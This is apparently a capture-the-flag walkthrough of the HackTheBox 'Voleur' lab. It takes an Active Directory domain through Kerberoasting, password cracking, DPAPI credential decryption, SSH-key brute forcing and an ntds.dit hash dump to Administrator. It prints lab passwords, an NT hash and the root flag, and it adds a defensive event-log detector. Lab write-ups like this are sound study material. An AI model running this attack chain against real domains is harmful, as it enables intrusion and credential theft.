Setup
mkdir -p ~/ctf/HackTheBox/voleur/scans && cd ~/ctf/HackTheBox/voleur
IP Address: 10.10.11.76
Add to /etc/hosts (requires sudo):
echo "10.10.11.76 voleur.htb" | sudo tee -a /etc/hosts
10.10.11.76 voleur.htb
As this is an assumed-breach scenario, we are provided with a low-privilege account and its credentials: ryan.naylor:HollowOct31Nyt
Enumeration
Fast sweep variant:
nmap -sC -sV -p- -T4 --min-rate 2000 -vv voleur.htb -oN ~/ctf/HackTheBox/voleur/scans/nmap_fast_20250814-112058.txt
# nmap findings
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
2222/tcp open ssh syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
55183/tcp open unknown syn-ack ttl 127
55184/tcp open unknown syn-ack ttl 127
55197/tcp open unknown syn-ack ttl 127
55203/tcp open unknown syn-ack ttl 127
55217/tcp open unknown syn-ack ttl 127
Using NetExec and the given credentials, we enumerate the following:
![IMG-20250814124513849](/images/post/IMG-20250814124513849.png)
We are unable to authenticate with the password alone, so let's get a Kerberos TGT using Impacket's getTGT.py and export the resulting ccache to the KRB5CCNAME variable:
getTGT.py voleur.htb/ryan.naylor:HollowOct31Nyt
export KRB5CCNAME=ryan.naylor.ccache
![IMG-20250814124513888](/images/post/IMG-20250814124513888.png)
Now we are able to authenticate successfully by providing the ticket. Let's enumerate using BloodHound:
nxc ldap 10.10.11.76 -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --bloodhound -c All --dns-server 10.10.11.76
Let's also get a user list so that we can look them up individually in BloodHound:
Administrator
Guest
krbtgt
ryan.naylor
marie.bryant
lacey.miller
svc_ldap
svc_backup
svc_iis
jeremy.combs
svc_winrm
While enumerating shares we find a share called IT, on which ryan.naylor has read permissions.
![IMG-20250814124513905](/images/post/IMG-20250814124513905.png)
Using smbclient.py -k dc.voleur.htb we log in as ryan.naylor with the ticket and see that the share contains an Access_Review.xlsx file.
![IMG-20250814125154851](/images/post/IMG-20250814125154851.png)
When we open the file we see it is password protected:
![IMG-20250814125443297](/images/post/IMG-20250814125443297.png)
Using john we extract the hash and crack the password:
office2john Access_Review.xlsx > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
![IMG-20250814131008052](/images/post/IMG-20250814131008052.png)
Now we can open the Excel file and see the accounts and passwords for the service accounts:
![IMG-20250814150914420](/images/post/IMG-20250814150914420.png)
Looking in BloodHound we see WriteSPN over svc_winrm and GenericWrite over lacey.miller and an OU.
![IMG-20250814153229192](/images/post/IMG-20250814153229192.png)
We run targetedKerberoast as svc_ldap:
python3 ~/tools/targetedKerberoast/targetedKerberoast.py -v -d 'voleur.htb' --dc-host dc.voleur.htb -k -u 'svc_ldap'
![IMG-20250814154550168](/images/post/IMG-20250814154550168.png)
Using hashcat we crack the resulting hashes:
.\hashcat.exe .\kerb_hashes .\rockyou.txt
![IMG-20250814154814658](/images/post/IMG-20250814154814658.png)
We recover the password for svc_winrm: svc_winrm:AFireInsidedeOzarctica980219afi
After exporting the ccache file to the KRB5CCNAME variable in the terminal, I received the following error from WinRM:
![IMG-20250814164700695](/images/post/IMG-20250814164700695.png)
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot find KDC for realm "VOLEUR.HTB"
From evil-winrm's help output I learned that I had to define the KDC for the realm in my /etc/krb5.conf file, like below:
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
    }
After that I was able to get a shell as svc_winrm:
![IMG-20250814165250799](/images/post/IMG-20250814165250799.png)
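For reference, a complete minimal /etc/krb5.conf for this lab, added here as an example (not from the original post): the [realms] block is what fixes the "Cannot find KDC" error above, the [domain_realm] section maps the DC's hostname to the realm for GSSAPI, and the dns_lookup_* settings stop the library from attempting DNS SRV/TXT lookups against your regular resolver.

```ini
[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB
```

The hostname dc.voleur.htb must also resolve on the attacking machine; the /etc/hosts line in Setup only maps voleur.htb, so add dc.voleur.htb to it if you have not already.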
User Flag
Location: C:\Users\svc_winrm\Desktop | Flag:
Privilege Escalation
As we have the credentials for svc_ldap, and the Excel file gives us the password for todd.wolfe, we can use bloodyAD to enable the disabled account, since it is part of Second Line Support:
bloodyAD --host dc.voleur.htb -d voleur.htb -k -u svc_ldap -p M1XyC9pW7qT5Vn set restore todd.wolfe
(Alternate command which should have worked but didn't:)
bloodyAD --host dc.voleur.htb -k -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn remove uac todd.wolfe -f ACCOUNTDISABLE
![IMG-20250814162105569](/images/post/IMG-20250814162105569.png)
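The two directory-permission abuses used so far, the SPN written onto svc_winrm and then Kerberoasted, and the re-enabling of the disabled todd.wolfe account, both leave clear traces in the domain controller's Security log. The following Python is an added example, not code from the original write-up: it runs a simple correlation over constructed event records (the account names mirror the page, the events themselves are made up) and shows the defender's view of these steps.

```python
# Added example, not from the original write-up: a small detector for the two
# directory abuses above, run over constructed Windows Security events.
# Event IDs are the real ones (5136 directory object modified, 4769 Kerberos
# service ticket requested, 4722 user account enabled); the records are
# constructed for this example and are not telemetry from the box.
from collections import defaultdict

SAMPLE_EVENTS = [  # constructed sample, not real telemetry
    {"id": 5136, "time": 1, "subject": "svc_ldap",
     "object": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "attribute": "servicePrincipalName", "op": "add"},
    {"id": 4769, "time": 2, "subject": "svc_ldap", "service": "svc_winrm", "etype": "0x17"},
    {"id": 4769, "time": 3, "subject": "marie.bryant", "service": "DC$", "etype": "0x12"},
    {"id": 5136, "time": 4, "subject": "svc_ldap",
     "object": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "attribute": "servicePrincipalName", "op": "delete"},
    {"id": 4722, "time": 5, "subject": "svc_ldap", "target": "todd.wolfe"},
]

def cn_of(dn):
    """First RDN value of a distinguished name: 'CN=x,...' -> 'x'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def detect(events):
    """Return alert strings, oldest first, for the patterns described above."""
    spn_written = defaultdict(set)  # account -> actors who added an SPN to it
    alerts = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] == 5136 and e.get("attribute") == "servicePrincipalName":
            acct = cn_of(e["object"])
            if e["op"] == "add":
                spn_written[acct].add(e["subject"])
                alerts.append(f"SPN added to user {acct} by {e['subject']} (possible WriteSPN abuse)")
            elif acct in spn_written:
                alerts.append(f"SPN removed from {acct} by {e['subject']} after being added (cleanup)")
        # Only RC4 (0x17) service tickets for accounts that just received an SPN
        # are flagged, so ordinary RC4 requests for old services do not alert.
        elif e["id"] == 4769 and e.get("etype") == "0x17" and e["service"] in spn_written:
            alerts.append(f"RC4 service ticket for {e['service']} requested by {e['subject']} (targeted Kerberoast)")
        elif e["id"] == 4722:
            alerts.append(f"account {e['target']} enabled by {e['subject']}")
    return alerts

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```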
Now let's check the account with the credentials todd.wolfe:NightT1meP1dg3on14:
![IMG-20250814162251091](/images/post/IMG-20250814162251091.png)
Let's enumerate shares as todd.wolfe:
![IMG-20250814170045493](/images/post/IMG-20250814170045493.png)
todd.wolfe also has access to IT; we enumerate it for any useful information:
![IMG-20250814170216439](/images/post/IMG-20250814170216439.png)
We have access to the Second-Line Support folder, which contains a backup of todd.wolfe's user profile. Following this article on DPAPI secrets, we find the master key and two credential files at:
/Second-Line Support/Archived Users/todd.wolfe/Appdata/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
/Second-Line Support/Archived Users/todd.wolfe/Appdata/Roaming/Microsoft/Credentials
/Second-Line Support/Archived Users/todd.wolfe/Appdata/Local/Microsoft/Credentials
![IMG-20250815141855484](/images/post/IMG-20250815141855484.png)
Let's get the SID of user todd.wolfe so that we can decrypt the master key:
lookupsid.py -k dc.voleur.htb
![IMG-20250815142938421](/images/post/IMG-20250815142938421.png)
With the SID and todd.wolfe's password we decrypt the master key:
dpapi.py masterkey -k -file masterkey -sid 'S-1-5-21-3927696377-1337352550-2781715495-1110' -password NightT1meP1dg3on14
![Pasted image 20250815144131](/images/post/Pasted%20image%2020250815144131.png)
Using the decrypted master key we then decrypt the credential file:
dpapi.py credential -file dpapi/772275FAD58525253490A9B0039791D3 -key '0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83'
We get the credentials for jeremy.combs:
jeremy.combs:qT3V9pLXyN7W4m
From the Access Review spreadsheet we know Jeremy is a Third-Line Support technician who also has access to the Software folder. Let's enumerate his shares, and since he is a Remote Management user we can also log in through WinRM.
![Pasted image 20250815145343](/images/post/Pasted%20image%2020250815145343.png)
We have read access to IT.
In the IT share we find a note saying that the admin has enabled WSL for backups, along with an id_rsa file, which is an SSH private key. From the nmap results we know that port 2222 is running SSH.
Using hydra (with the help of this source file) we can brute-force which user the SSH key belongs to:
hydra -L users -p id_rsa sshkey://10.10.11.76:2222
![Pasted image 20250815151856](/images/post/Pasted%20image%2020250815151856.png)
Now let's log in and check:
![Pasted image 20250815152956](/images/post/Pasted%20image%2020250815152956.png)
We have sudo access, and since this is WSL we know we can access the Windows drives unrestricted.
In the IT/Third-Line Support folder we find a Backups folder containing an ntds.dit file and a SYSTEM registry hive; with the SYSTEM hive we can decrypt the ntds.dit.
We copy these files from svc_backup to our local machine using scp:
scp -r -i id_rsa -v -P 2222 svc_backup@10.10.11.76:'/mnt/c/IT/Third-Line Support/Backups/Active Directory' .
scp -r -i id_rsa -v -P 2222 svc_backup@10.10.11.76:'/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM' .
Now we can use secretsdump.py to dump the hashes from the ntds.dit file:
secretsdump.py -k -ntds Active\ Directory/ntds.dit -system SYSTEM local
![Pasted image 20250815221414](/images/post/Pasted%20image%2020250815221414.png)
We have the NT hash for the Administrator account; now let's generate a TGT and access WinRM:
Administrator:e656e07c56d831611b577b160b259ad2
![Pasted image 20250815221742](/images/post/Pasted%20image%2020250815221742.png)
Root Flag
Location: C:\Users\Administrator\Desktop | Flag: e6c516ba08e719863b37f0add790d88d